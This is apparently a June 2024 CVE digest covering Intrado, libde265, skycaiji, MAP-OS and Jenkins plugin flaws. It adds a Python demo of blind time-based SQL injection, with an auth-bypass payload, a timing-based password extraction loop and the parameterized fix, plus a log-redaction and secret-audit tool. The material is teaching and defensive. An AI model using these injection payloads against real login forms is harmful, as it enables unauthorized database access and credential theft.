Security Vulnerabilities
- CVEs Published In June 2024
The Intrado 911 Emergency Gateway login form is vulnerable to an unauthenticated blind time-based SQL injection, which may allow a remote attacker, without any credentials, to execute malicious code, exfiltrate data, or manipulate the database. Because the injection is blind and time-based, the attacker gets no query output back; data is recovered by making the database delay its response when a guessed condition is true.
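The following is an added example, not Intrado code (the gateway's internals are not described here). It shows the general shape of the bug class: a login query built by string concatenation, the timing oracle that gives an attacker even when the page returns nothing, and the parameterized form that closes it. SQLite in memory stands in for the real database, a user-defined sleep() plays the role of MySQL SLEEP()/MSSQL WAITFOR, and the schema, user row, password and payloads are all constructed for the demo.

```python
"""Blind time-based SQL injection in a login form: vulnerable query,
the timing oracle it hands an attacker, and the parameterized fix.

Added example, not Intrado code. SQLite in memory stands in for the real
database; sleep() is a user-defined stand-in for MySQL SLEEP()/MSSQL WAITFOR.
Schema, user row, password and payloads are constructed for the demo.
"""
import sqlite3
import time

SLEEP_CALLS = {"count": 0}   # how often injected SQL actually reached sleep()


def _attacker_sleep(seconds):
    SLEEP_CALLS["count"] += 1
    time.sleep(float(seconds))
    return 0                 # falsy, so the row still does not match


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _attacker_sleep)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def login_vulnerable(conn, username, password):
    # Form fields spliced into the statement: the attacker is writing SQL.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, username, password):
    # Bound parameters: the input is data and is never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def timed(fn, *args):
    t0 = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - t0


DELAY = 0.15   # seconds the injected sleep() asks for


def blind_extract_char(conn, position, login=login_vulnerable,
                       alphabet="abcdefghijklmnopqrstuvwxyz "):
    """Recover one character of admin's password from response time alone.

    The login never says whether the guess was right; only the delay does.
    Returns None when no guess triggers the delay (e.g. against login_fixed).
    """
    for ch in alphabet:
        payload = ("' OR (SELECT CASE WHEN substr(password,%d,1)='%s' "
                   "THEN sleep(%s) ELSE 0 END FROM users WHERE username='admin')--"
                   % (position, ch, DELAY))
        _, elapsed = timed(login, conn, payload, "x")
        if elapsed >= DELAY / 2:
            return ch
    return None


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "' OR 1=1--", "x"))       # True
    print("char 1:", blind_extract_char(db, 1))                     # 'c'
    print("fixed: ", blind_extract_char(db, 1, login=login_fixed))  # None
```

Each call to blind_extract_char issues one login attempt per candidate character; against the vulnerable function the one that matches takes DELAY longer, against the fixed function the payload is compared as a literal username and nothing is ever slow. Real tooling does the same with a binary search over the character range and a few repetitions per guess to ride out network jitter.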
A heap buffer overflow vulnerability in Libde265 v1.0.15 allows attackers to crash the application via a crafted payload to the display444as420 function in sdl.cc.
A heap buffer overflow vulnerability in Libde265 v1.0.15 allows attackers to crash the application via a crafted payload reaching the __interceptor_memcpy function. (__interceptor_memcpy is AddressSanitizer's wrapper around memcpy, so this names the memcpy call that ASan caught rather than a libde265 function of that name.)
A cross-site scripting (XSS) vulnerability in skycaiji 2.8 allows attackers to run arbitrary code via /admin/tool/preview.
A cross-site scripting (XSS) vulnerability in skycaiji v2.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload using eval(String.fromCharCode()).
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via a crafted POST request to /index.php?s=/admin/develop/editor_save.
MAP-OS v4.45.0 and earlier was discovered to contain a cross-site scripting (XSS) vulnerability.
When Jenkins Structs Plugin 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters, potentially resulting in accidental exposure of secrets through the default system log.
In rare cases Jenkins Plain Credentials Plugin 182.v468b_97b_9dcb_8 and earlier stores secret file credentials unencrypted (only Base64 encoded) on the Jenkins controller file system, where they can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).
Jenkins Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.
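The three Jenkins entries above share one failure mode: credential material reaching a log or the file system in clear text, whether as step parameters in a warning, a Base64 blob that was never encrypted, or a token embedded in a URL. The following is an added example, not Jenkins or plugin code, of the two controls a practitioner wants: redaction at the log sink so a URL's userinfo, token-like parameters and Authorization headers never get written, and an audit pass over existing log text to find what already leaked. The log lines, URL shapes and token strings are constructed for the demo and are assumptions about what a leaky log might contain, not what the affected plugins print.

```python
"""Keeping secrets out of logs: redact at the log sink, then audit old logs.

Added example, not Jenkins or plugin code. The sample log, URL shapes and
token strings below are constructed assumptions, not real plugin output.
"""
import logging
import re
from urllib.parse import urlsplit, urlunsplit

# "key=value" / "key: value" pairs whose key names a credential. The value
# stops at whitespace, quotes, or delimiters that close a map or query string.
KV = re.compile(
    r'(?i)\b(access_token|token|password|passwd|secret|api[_-]?key|client_secret)'
    r'(\s*[=:]\s*)([^\s"\'&,;})\]]+)')
# Authorization headers carrying a bearer token or basic-auth blob.
AUTH = re.compile(r"(?i)\b(authorization\s*:\s*(?:bearer|basic))\s+(\S+)")
# Anything that looks like an absolute URL; credentials hide in its userinfo.
URL = re.compile(r"(?i)\b[a-z][a-z0-9+.-]*://[^\s\"'<>]+")


def _redact_url(url):
    parts = urlsplit(url)
    netloc = parts.netloc
    if "@" in netloc:                      # scheme://user:TOKEN@host/...
        userinfo, host = netloc.rsplit("@", 1)
        user, sep, _ = userinfo.partition(":")
        # Keep the username when there is one; a bare token becomes ***.
        netloc = (user + ":***@" if sep else "***@") + host
    query = KV.sub(lambda m: m.group(1) + m.group(2) + "***", parts.query)
    return urlunsplit((parts.scheme, netloc, parts.path, query, parts.fragment))


def redact(line):
    """Return the line with credential material replaced by ***."""
    line = URL.sub(lambda m: _redact_url(m.group(0)), line)
    line = KV.sub(lambda m: m.group(1) + m.group(2) + "***", line)
    return AUTH.sub(lambda m: m.group(1) + " ***", line)


class RedactingFilter(logging.Filter):
    """Attach to a handler so every record is scrubbed before it is written."""

    def filter(self, record):
        record.msg = redact(record.getMessage())
        record.args = ()
        return True


def find_leaks(text):
    """Audit existing log text: (line number, original, redacted) per hit."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        clean = redact(line)
        if clean != line:
            hits.append((n, line, clean))
    return hits


# Constructed sample log (assumption: not real Jenkins output).
SAMPLE_LOG = """\
[Pipeline] git
Cloning https://x-token-auth:aBcD1234EfGh@bitbucket.org/acme/widget.git
WARNING: Could not configure step 'deploy', parameters: {credentialsId=prod-db, password=hunter2}
GET https://api.example.com/repos?access_token=ya29.secret-token&page=2
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.sig
Build step 'Execute shell' completed with status 0
"""


if __name__ == "__main__":
    for n, raw, clean in find_leaks(SAMPLE_LOG):
        print("line %d: %s" % (n, clean))
    log = logging.getLogger("demo")
    handler = logging.StreamHandler()
    handler.addFilter(RedactingFilter())
    log.addHandler(handler)
    log.warning("fetching %s",
                "https://x-token-auth:aBcD1234EfGh@bitbucket.org/acme/widget.git")
```

Redacting at the handler rather than at each call site is the point: the Structs and Bitbucket cases are exactly the situation where some code path the author did not think about formats a parameter map or a URL into a message. The patterns are deliberately broad (any key that smells like a credential, any URL userinfo), so expect a few false positives in an audit; that is cheaper than a missed token.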